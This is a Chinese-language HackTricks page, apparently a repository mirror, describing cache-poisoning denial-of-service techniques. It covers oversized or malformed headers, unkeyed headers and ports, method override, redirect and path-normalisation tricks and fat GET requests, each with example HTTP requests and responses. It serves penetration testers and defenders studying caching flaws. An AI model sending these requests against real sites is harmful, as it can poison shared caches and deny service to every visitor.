mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
126 lines
3.8 KiB
Markdown
126 lines
3.8 KiB
Markdown
# Cache Poisoning to DoS
|
||
|
||
{{#include ../../banners/hacktricks-training.md}}
|
||
|
||
> [!CAUTION]
|
||
> 在此页面中,您可以找到不同的变体,以尝试使 **web 服务器对有效的缓存服务器请求** 返回错误
|
||
|
||
- **HTTP Header Oversize (HHO)**
|
||
|
||
发送一个头部大小大于 web 服务器支持的大小,但小于缓存服务器支持的大小的请求。web 服务器将返回一个 400 响应,该响应可能会被缓存:
|
||
```
|
||
GET / HTTP/1.1
|
||
Host: redacted.com
|
||
X-Oversize-Hedear:Big-Value-000000000000000
|
||
```
|
||
- **HTTP Meta Character (HMC) & Unexpected values**
|
||
|
||
发送一个包含一些**有害元字符**的头,例如和。在攻击生效之前,您必须先绕过缓存。
|
||
```
|
||
GET / HTTP/1.1
|
||
Host: redacted.com
|
||
X-Meta-Hedear:Bad Chars\n \r
|
||
```
|
||
一个配置不当的头部可能仅仅是 `\:` 作为头部。
|
||
|
||
如果发送了意外的值,例如意外的 Content-Type:,这也可能有效。
|
||
```
|
||
GET /anas/repos HTTP/2
|
||
Host: redacted.com
|
||
Content-Type: HelloWorld
|
||
```
|
||
- **未键头**
|
||
|
||
一些网站如果在请求中**看到某些特定的头**,例如带有 _X-Amz-Website-Location-Redirect: someThing_ 头时,会返回错误状态代码:
|
||
```
|
||
GET /app.js HTTP/2
|
||
Host: redacted.com
|
||
X-Amz-Website-Location-Redirect: someThing
|
||
|
||
HTTP/2 403 Forbidden
|
||
Cache: hit
|
||
|
||
Invalid Header
|
||
```
|
||
- **HTTP 方法覆盖攻击 (HMO)**
|
||
|
||
如果服务器支持使用诸如 `X-HTTP-Method-Override`、`X-HTTP-Method` 或 `X-Method-Override` 的头部更改 HTTP 方法。可以通过更改方法请求有效页面,以便服务器不支持它,从而导致错误响应被缓存:
|
||
```
|
||
GET /blogs HTTP/1.1
|
||
Host: redacted.com
|
||
HTTP-Method-Override: POST
|
||
```
|
||
- **无键端口**
|
||
|
||
如果主机头中的端口在响应中被反射且未包含在缓存键中,则可以将其重定向到未使用的端口:
|
||
```
|
||
GET /index.html HTTP/1.1
|
||
Host: redacted.com:1
|
||
|
||
HTTP/1.1 301 Moved Permanently
|
||
Location: https://redacted.com:1/en/index.html
|
||
Cache: miss
|
||
```
|
||
- **长重定向 DoS**
|
||
|
||
如以下示例所示,x 没有被缓存,因此攻击者可以利用重定向响应行为,使重定向发送一个如此大的 URL 以至于返回错误。然后,试图在没有未缓存的 x 密钥的情况下访问该 URL 的人将收到错误响应:
|
||
```
|
||
GET /login?x=veryLongUrl HTTP/1.1
|
||
Host: www.cloudflare.com
|
||
|
||
HTTP/1.1 301 Moved Permanently
|
||
Location: /login/?x=veryLongUrl
|
||
Cache: hit
|
||
|
||
GET /login/?x=veryLongUrl HTTP/1.1
|
||
Host: www.cloudflare.com
|
||
|
||
HTTP/1.1 414 Request-URI Too Large
|
||
CF-Cache-Status: miss
|
||
```
|
||
- **主机头部大小写规范化**
|
||
|
||
主机头部应该是不区分大小写的,但某些网站期望它是小写的,如果不是则会返回错误:
|
||
```
|
||
GET /img.png HTTP/1.1
|
||
Host: Cdn.redacted.com
|
||
|
||
HTTP/1.1 404 Not Found
|
||
Cache:miss
|
||
|
||
Not Found
|
||
```
|
||
- **路径规范化**
|
||
|
||
某些页面在路径中发送数据 URLencode 时会返回错误代码,但缓存服务器会对路径进行 URLdecode 并存储 URLdecoded 路径的响应:
|
||
```
|
||
GET /api/v1%2e1/user HTTP/1.1
|
||
Host: redacted.com
|
||
|
||
|
||
HTTP/1.1 404 Not Found
|
||
Cach:miss
|
||
|
||
Not Found
|
||
```
|
||
- **Fat Get**
|
||
|
||
一些缓存服务器,如 Cloudflare,或 web 服务器,停止带有主体的 GET 请求,因此这可能被滥用来缓存无效响应:
|
||
```
|
||
GET /index.html HTTP/2
|
||
Host: redacted.com
|
||
Content-Length: 3
|
||
|
||
xyz
|
||
|
||
|
||
HTTP/2 403 Forbidden
|
||
Cache: hit
|
||
```
|
||
## 参考文献
|
||
|
||
- [https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52](https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52)
|
||
- [https://youst.in/posts/cache-poisoning-at-scale/?source=post_page-----3a829f221f52--------------------------------](https://youst.in/posts/cache-poisoning-at-scale/?source=post_page-----3a829f221f52--------------------------------)
|
||
|
||
{{#include ../../banners/hacktricks-training.md}}
|